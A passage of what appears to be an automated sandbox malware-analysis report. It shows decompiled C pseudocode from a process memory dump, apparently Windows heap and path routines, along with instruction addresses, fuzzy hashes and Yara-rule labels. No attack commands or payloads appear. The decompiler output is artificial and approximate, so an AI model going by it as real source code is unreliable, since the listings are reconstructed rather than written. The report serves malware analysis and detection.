						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0299F380(_t67 + 0xc, 0x2935138, 0x10) == 0) {
								 *0x2a460d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E02984F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E02984E70(0x2a486b0, 0x2985690, 0, 0) != 0) {
					_t46 = E0295CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x02984d3b
0x02984d4d
0x02984d53
0x02984d58
0x02984d65
0x02984d6c
0x02984d71
0x02984d77
0x02984d7f
0x02984d8c
0x02984d8e
0x02984dad
0x02984db0
0x02984db7
0x02984db8
0x02984db9
0x02984dba
0x02984dbb
0x02984dc1
0x02984dc8
0x02984dcc
0x02984dd5
0x02984dde
0x02984ddf
0x02984de0
0x02984de1
0x02984de6
0x02984de7
0x02984de9
0x02984df3
0x00000000
0x00000000
0x029c6c7c
0x029c6c8a
0x029c6c8a
0x029c6c9d
0x029c6ca7
0x029c6cac
0x029c6cb2
0x029c6cb9
0x00000000
0x029c6cbf
0x029c6cbf
0x00000000
0x029c6cbf
0x029c6cb9
0x02984dfb
0x029c6ccf
0x029c6cd3
0x02984e32
0x02984e39
0x029c6ce0
0x029c6cf2
0x029c6cf2
0x029c6ce0
0x02984e3f
0x02984e41
0x02984e51
0x02984e51
0x02984e03
0x02984e03
0x02984e09
0x02984e0f
0x02984e57
0x00000000
0x00000000
0x02984e1b
0x02984e30
0x02984e5b
0x02984e5b
0x00000000
0x02984e30
0x02984e11
0x02984e11
0x02984e16
0x00000000
0x02984e16
0x02984e01
0x00000000
0x02984e01
0x02984da5
0x029c6c6b
0x00000000
0x02984dab
0x02984dab
0x00000000
0x02984dab

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208cbedc3f6cc7d622a7de128db60abdd28384411c038ecdda90b8779fa2cd07
Instruction ID: e44b5663b1d80c68580c4ab9ea597ab66c9d850051ad1594dd04451831bd0d1f
Opcode Fuzzy Hash: 208cbedc3f6cc7d622a7de128db60abdd28384411c038ecdda90b8779fa2cd07
Instruction Fuzzy Hash: B5419372A40318AFEB21EF14CC80F67B7AAEF85714F04449AE94597281DB75ED44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02968A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02968A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x2a4d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0299B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0296E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x2931180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E02981DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E02993C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E02968999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x02968a0a
0x02968a1c
0x02968a23
0x02968a2e
0x02968a30
0x02968a36
0x02968a3c
0x02968a3e
0x02968a4a
0x02968a52
0x02968a9c
0x02968aae
0x02968a58
0x02968a5e
0x02968a6a
0x02968a6f
0x02968a75
0x02968a7d
0x02968a85
0x02968a86
0x02968a89
0x02968a93
0x02968a99
0x02968a9b
0x00000000
0x02968aaf
0x02968abe
0x02968ac3
0x02968acb
0x02968ad7
0x02968ae0
0x02968af1
0x00000000
0x02968af1
0x02968acd
0x02968ad5
0x02968afb
0x02968afd
0x02968aff
0x02968b07
0x02968b22
0x02968b24
0x02968b2a
0x02968b2e
0x02968b3f
0x02968b78
0x02968b41
0x02968b52
0x02968b54
0x02968b5c
0x02968b74
0x02968b74
0x02968b5c
0x02968b3f
0x02968b5e
0x02968b61
0x02968b64
0x02968b64
0x02968b6c
0x02968b6c
0x02968b11
0x029b9cd5
0x029b9cd5
0x02968b17
0x02968b1a
0x02968b1a
0x00000000
0x02968ad5
0x02968a89

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4b42c0374c1c31c5c598bd2c8f99a3f79312f44e4ab0ed4b962104dec8f156
Instruction ID: d14fc3033e59af4d96c514cf44926f1ad4f4702cfd83f248d79fc15b2a37db15
Opcode Fuzzy Hash: cf4b42c0374c1c31c5c598bd2c8f99a3f79312f44e4ab0ed4b962104dec8f156
Instruction Fuzzy Hash: 304140B5A4022D9BDB24DF69C88CBB9B7F9FB84300F1045EAD81997251E7719E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02A1AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A1AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E02A1ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E02A1AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E02A1AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E029FCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L029777F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E02977D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02A1131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E029FCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x02a1aa1f
0x02a1aa21
0x02a1aa23
0x02a1aa2b
0x02a1aa30
0x02a1aa36
0x02a1aa39
0x02a1aa42
0x02a1aa75
0x02a1aa7a
0x02a1aa7c
0x02a1aa7c
0x02a1aa88
0x02a1aa8a
0x02a1aa8f
0x02a1ab02
0x02a1ab04
0x02a1aa99
0x02a1aaa8
0x02a1aaaf
0x02a1aab3
0x02a1aacc
0x02a1aad1
0x02a1aad6
0x02a1aae0
0x02a1aaf3
0x02a1aaf9
0x02a1aafe
0x02a1aafe
0x02a1aaf3
0x02a1aad6
0x02a1aab3
0x02a1ab07
0x02a1ab0a
0x02a1ab11
0x02a1ab23
0x02a1ab13
0x02a1ab1c
0x02a1ab1c
0x02a1ab2b
0x02a1ab44
0x02a1ab44
0x02a1ab51
0x02a1ab51
0x02a1aa44
0x02a1aa47
0x02a1aa4c
0x00000000
0x00000000
0x02a1aa5a
0x02a1aa64
0x02a1aa72
0x00000000
0x02a1aa66
0x02a1aa66
0x02a1aa68
0x02a1aa6a
0x00000000
0x02a1aa6a

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: be5e4604d32ce44a5ff793487c818b7bf1380e42b245d9098351e1f70f616236
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 4531E436F061846BDB158BA5C985BBFF7BBEF84320F058069E905A7292DF749D00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A1FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02A1FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E02A1FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E02A20A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E02977D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E02A11608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E02A22B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E02A1C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E02A1DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E02977D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E02A1A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x02a1fde7
0x02a1fde8
0x02a1fdec
0x02a1fdee
0x02a1fdf5
0x02a1fdf7
0x02a1fdfc
0x02a1fe19
0x02a1fe22
0x02a1fe26
0x02a1fec6
0x02a1fecd
0x02a1fed5
0x02a1fee7
0x02a1fed7
0x02a1fee0
0x02a1fee0
0x02a1feef
0x02a1ff00
0x02a1ff02
0x02a1ff07
0x02a1ff07
0x00000000
0x02a1feef
0x02a1fe33
0x02a1fe55
0x02a1fe59
0x02a1fe5b
0x02a1fe5e
0x02a1fe69
0x02a1fe6d
0x02a1fe6d
0x02a1fe69
0x02a1fe35
0x02a1fe41
0x02a1fe41
0x02a1fe79
0x02a1fe8b
0x02a1fe7b
0x02a1fe84
0x02a1fe84
0x02a1fe93
0x00000000
0x02a1fea8
0x02a1feba
0x00000000
0x02a1feba
0x02a1fdfe
0x02a1fe01
0x02a1fe02
0x02a1fe08
0x02a1ff0c
0x02a1ff14
0x02a1ff14

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 27cc959792df9b5b6dab3f17f27abb48ce7bd94715e25fa4b5723fc556e7038d
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 1C310736204B806FD7219768C984F6AB7A7EBC5360F184159E449CBB82DF74DC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A1EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E02A1EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E02972280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E02A1E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0295F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0296FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E02A1AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E02A1BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E02977D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E02A0FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0296FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E02A1A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x02a1ea55
0x02a1ea66
0x02a1ea68
0x02a1ea6c
0x02a1ea6f
0x02a1ea72
0x02a1ea75
0x02a1ea7a
0x02a1ea7a
0x02a1ea7e
0x02a1ea80
0x02a1ea85
0x02a1ea8b
0x02a1eab5
0x02a1eabc
0x02a1eabf
0x02a1eabf
0x02a1eaca
0x02a1eace
0x02a1ead0
0x02a1eae4
0x02a1eaeb
0x02a1eaf0
0x02a1eaf5
0x02a1eb09
0x02a1eb0d
0x02a1eb1d
0x02a1eb2d
0x02a1eb38
0x02a1eb3d
0x02a1eb41
0x02a1eb4a
0x02a1eb60
0x02a1eb4c
0x02a1eb52
0x02a1eb59
0x02a1eb59
0x02a1eb68
0x02a1eb71
0x02a1eb71
0x02a1ea8d
0x02a1ea8f
0x02a1ea92
0x02a1ea97
0x02a1ea97
0x02a1ea9b
0x02a1ea9c
0x02a1ea9e
0x02a1eaa6
0x02a1eaa6
0x02a1eb7e

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 6167f34d21fcbd88e0e3506cdb4f97643fd714bac433baf2732cd03256323bde
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 6B3183726047059FC719DF24CA84A6BB7EAFBC4360F04892DF95687681DF30E805CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 029D69A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E029D69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x2a4d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L02966C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E029D6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E02999980() >= 0) {
							E02972280(_t56, 0x2a48778);
							_t77 = 1;
							_t68 = 1;
							if( *0x2a48774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x2a48774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0295B6F0(0x293c338, 0x293c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E02999520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E029995D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0296FFB0(_t68, _t77, 0x2a48778);
				}
				_pop(_t78);
				return E0299B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x029d69b5
0x029d69be
0x029d69c3
0x029d69c9
0x029d69cc
0x029d69d1
0x029d69d3
0x029d69de
0x029d69e1
0x029d69ea
0x029d69f6
0x029d69fe
0x029d6a13
0x029d6a14
0x029d6a15
0x029d6a16
0x029d6a1e
0x029d6a26
0x029d6a31
0x029d6a36
0x029d6a37
0x029d6a40
0x029d6a49
0x029d6a4a
0x029d6a53
0x029d6a59
0x029d6a5d
0x029d6a5e
0x029d6a64
0x029d6a67
0x029d6a6a
0x029d6a6d
0x029d6a70
0x029d6a77
0x029d6a7d
0x029d6a86
0x029d6a89
0x029d6a9c
0x029d6a9f
0x029d6aa2
0x029d6aa5
0x029d6aaf
0x029d6ab1
0x029d6ab8
0x029d6ab9
0x029d6abb
0x029d6abe
0x029d6ac5
0x029d6ac5
0x029d6aaf
0x029d6a40
0x029d6a26
0x029d69fe
0x029d6ace
0x029d6ad0
0x029d6ad3
0x029d6ad8
0x029d6adf
0x029d6adf
0x029d6ae8
0x029d6aef
0x029d6aef
0x029d6af9
0x029d6b06

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277c933780531684b996d59cabdc4619ad83279d0860ca9d701599451dd612e8
Instruction ID: 0949e4210abea98f17da283ba376aab2229308d231a0aaed1f02d56faca076c2
Opcode Fuzzy Hash: 277c933780531684b996d59cabdc4619ad83279d0860ca9d701599451dd612e8
Instruction Fuzzy Hash: 74418EB1D40208AFDB14CFA5E940BFEBBF9EF88714F04812AE955A3240DB74A945DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02955210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02955210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E029552A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E029995D0();
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0296EB70(_t54, 0x2a479a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E029995D0();
								L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0296EB70(_t54, 0x2a479a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0299F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0296EB70(_t54, 0x2a479a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E029995D0();
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x02955220
0x02955224
0x029b0d13
0x029b0d16
0x029b0d19
0x0295522a
0x0295522a
0x0295522d
0x0295522d
0x02955231
0x02955235
0x02955239
0x029b0d5c
0x029b0d62
0x00000000
0x00000000
0x029b0d6a
0x029b0d7b
0x029b0d7f
0x029b0d81
0x029b0d84
0x029b0d95
0x029b0d95
0x029b0d6c
0x029b0d71
0x029b0d71
0x029b0d9a
0x00000000
0x0295524a
0x0295524a
0x02955250
0x029b0d24
0x029b0d35
0x029b0d39
0x029b0d3b
0x029b0d3e
0x029b0d50
0x029b0d50
0x029b0d26
0x029b0d2b
0x029b0d2b
0x00000000
0x029b0d55
0x02955256
0x0295525b
0x02955265
0x029b0da7
0x0295526b
0x0295526e
0x02955272
0x029b0db1
0x029b0db4
0x029b0dc5
0x029b0dc5
0x02955272
0x02955278
0x0295527e
0x0295528a
0x0295528c
0x0295528d
0x00000000
0x02955280
0x02955282
0x02955288
0x0295529f
0x02955292
0x00000000
0x02955292
0x00000000
0x02955288
0x0295527e

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598ee70bfa8d8257c3bf594347f93aa25204f98ec0720697b603a706e2ed1c46
Instruction ID: 88e23181d630f5557120395dbca2f507aaaea32b660175e656b6ad05d8e87157
Opcode Fuzzy Hash: 598ee70bfa8d8257c3bf594347f93aa25204f98ec0720697b603a706e2ed1c46
Instruction Fuzzy Hash: 36310831651711EBCB229B28C941FB7B7AAFF80760F514A19E8554B5E1EB71E840CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0298A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0298A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x2a30220);
				E029AD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x2a47b9c; // 0x0
				_t55 = L02974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E029AD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
